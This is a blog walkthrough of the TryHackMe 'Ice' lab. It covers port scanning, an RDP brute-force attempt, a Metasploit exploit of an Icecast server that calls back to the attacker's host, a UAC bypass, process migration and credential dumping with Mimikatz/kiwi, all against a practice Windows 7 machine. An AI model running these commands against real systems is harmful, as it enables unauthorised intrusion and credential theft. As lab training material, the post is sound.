offsectryhackme

Exploiting Windows & Privilege Escalation from TryHackMe (ICE Room)

Photo of Samdup Samdup Send an email May 26, 2023
0 1,089 5 minutes read

Recon

NMAP SYN Scan

sudo nmap -sS -p- 10.10.185.210 -Pn -o nmap.log

For some reason, my nmap is taking a lot of time (perhaps I ran -p-  it means to enumerate all 65535 ports). Anyway, I quickly ran rustscan to get the ports.

rustscan -a 10.10.185.210 --range 1-65535
----. .-. .-. .----..---. .----. .---. .--. .-. .-. 
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | 
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | 
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' 
The Modern Day Port Scanner. 
________________________________________ 
: https://discord.gg/GFrQsGy : 
: https://github.com/RustScan/RustScan : 
-------------------------------------- 
😵 https://admin.tryhackme.com 

[~] The config file is expected to be at "/home/kali/.rustscan.toml" 
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers 
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.185.210:135 
Open 10.10.185.210:139 
Open 10.10.185.210:445 
Open 10.10.185.210:3389 
Open 10.10.185.210:5357 
Open 10.10.185.210:8000 
Open 10.10.185.210:49159 
Open 10.10.185.210:49160 
Open 10.10.185.210:49154 
Open 10.10.185.210:49152 
Open 10.10.185.210:49158 
Open 10.10.185.210:49153 
[~] Starting Script(s) 
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") 

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-26 11:43 EDT 
Initiating Ping Scan at 11:43 
Scanning 10.10.185.210 [2 ports] 
Completed Ping Scan at 11:43, 0.11s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of 1 host. at 11:43 
Completed Parallel DNS resolution of 1 host. at 11:43, 0.04s elapsed 
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] 
Initiating Connect Scan at 11:43 
Scanning 10.10.185.210 [12 ports] 
Discovered open port 445/tcp on 10.10.185.210 
Discovered open port 8000/tcp on 10.10.185.210 
Discovered open port 135/tcp on 10.10.185.210 
Discovered open port 49152/tcp on 10.10.185.210 
Discovered open port 139/tcp on 10.10.185.210 
Discovered open port 3389/tcp on 10.10.185.210 
Discovered open port 5357/tcp on 10.10.185.210 
Discovered open port 49158/tcp on 10.10.185.210 
Discovered open port 49154/tcp on 10.10.185.210 
Discovered open port 49153/tcp on 10.10.185.210 
Discovered open port 49160/tcp on 10.10.185.210 
Discovered open port 49159/tcp on 10.10.185.210 
Completed Connect Scan at 11:43, 0.18s elapsed (12 total ports) 
Nmap scan report for 10.10.185.210 
Host is up, received conn-refused (0.094s latency). 
Scanned at 2023-05-26 11:43:43 EDT for 0s

PORT STATE SERVICE REASON 
135/tcp open msrpc syn-ack 
139/tcp open netbios-ssn syn-ack 
445/tcp open microsoft-ds syn-ack 
3389/tcp open ms-wbt-server syn-ack 
5357/tcp open wsdapi syn-ack 
8000/tcp open http-alt syn-ack 
49152/tcp open unknown syn-ack 
49153/tcp open unknown syn-ack 
49154/tcp open unknown syn-ack 
49158/tcp open unknown syn-ack 
49159/tcp open unknown syn-ack 
49160/tcp open unknown syn-ack

Read data files from: /usr/bin/../share/nmap 
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

I got all the open ports and I know there is way to pass the rustscan ports and combine it with nmap but I am not confident to try that. So let’s do our usual way.

nmap -sC -sV -p135,139,445,3389,5357,8000,49152,49153,49154,49158,49159,49160 10.10.185.210

This nmap will only enumerate services and service versions of the ports in this list, so literally, it could reduce a lot of overhead.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-26 11:44 EDT
Nmap scan report for 10.10.185.210
Host is up (0.094s latency).

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2023-05-25T15:41:07
|_Not valid after: 2023-11-24T15:41:07
| rdp-ntlm-info: 
| Target_Name: DARK-PC
| NetBIOS_Domain_Name: DARK-PC
| NetBIOS_Computer_Name: DARK-PC
| DNS_Domain_Name: Dark-PC
| DNS_Computer_Name: Dark-PC
| Product_Version: 6.1.7601
|_ System_Time: 2023-05-26T15:46:16+00:00
|_ssl-date: 2023-05-26T15:46:21+00:00; +2s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02b59cba0cb7 (unknown)
| smb-security-mode: 
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
| 210: 
|_ Message signing enabled but not required
|_clock-skew: mean: 1h00m01s, deviation: 2h14m09s, median: 1s
| smb-os-discovery: 
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-05-26T10:46:15-05:00
| smb2-time: 
| date: 2023-05-26T15:46:16
|_ start_date: 2023-05-26T15:41:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.30 seconds

So based on the nmap result, we were we could easily answer the following questions.

However, I must confess that since I am not a window user, I had to check which port runs MSRDP and apparently the service runs on port 3389 (the default port for MSRDP).

Gain Access

Based on our nmap Result: I spent quite sometime doing some online research on availability of public exploits and I bumped into couple of rabbit holes but it was not a complete lost as I was able to collect couple of interesting information such as you could bruteforce rdb with help of a new tool called crowbar.

Rabbit hole:

sudo apt install crowbar -y 
crowbar -b rdp -s 10.10.185.210/32 -U /usr/share/seclists/Usernames/Names/names.txt -c 'password123'

It didn’t help but was quite interesting 🙂

Then I shift my focus to Icecast Streaming Media Server

using Metasploit, I was able to get the initial foothold.

msfconsole 
search icecast 
use 0 
show options 
set RHOSTS 10.10.185.210 
set LHOST  10.6.22.85  # my kali local IP was not right
exploit

Since the port numbers were right so ran it using the exploit command.

Answer:

Escalate

shell 

whoami 

sysinfo

run post/multi/recon/local_exploit_suggester

 

Copy the first name of the exploit suggested and paste it into the answer sheet and press Control+Z to send the current shell in the background.

use exploit/windows/local/bypassuac_eventvwr

show options

set LHOST 10.6.22.85

set session 1 
run

Answer:

Looting

ps

Based on the previous readings (I read a couple of walkthroughs in the past and ask myself the question, how do those researchers know which services are vulnerable and how do they get that kind of intuition despite they don’t have the absolute information of some services. I think experiences teach them and of course a lot of reading.) I know that the name of the service related to the printer is spoolsv.exe

Besides, there are so many things we could do with lsass (for privilege escalation) [2].

Now, let’s migrate to the process spoolsv.exe

migrate -N spoolsv.exe

getuid  # to check the user privilege

It’s affirmative that we have the full administrator privilege with the machine. Let’s load Mimikatz (a very powerful password-dumping tool).

load kiwi   # kiwi is the updated version of the Mimikatz

help

creds_all

Answer:

Post Exploitation

If you use the help command, you could answer all the questions in this section with a breeze 😉

username: dark

password: Password01!

IP: Password01!

We could use rdp and check the machine 🙂

rdesktop -u dark 10.10.219.220

Reference

[1] https://www.rapid7.com/blog/post/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/

[2] https://www.linkedin.com/pulse/lsassexe-exploited-process-jitu-mani-das/

[3] https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-3-3/

 

Post Views: 1,117
Photo of Samdup Samdup Send an email May 26, 2023
0 1,089 5 minutes read
Photo of Samdup

Samdup

Related Articles

Steel Mountain with and without using Metasploit

May 25, 2023

How I took down EvilBox from vulnhub

May 18, 2023

How I took down Mercury

May 17, 2023

Let’s take down JANGOW 01

May 13, 2023

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also
Close
Back to top button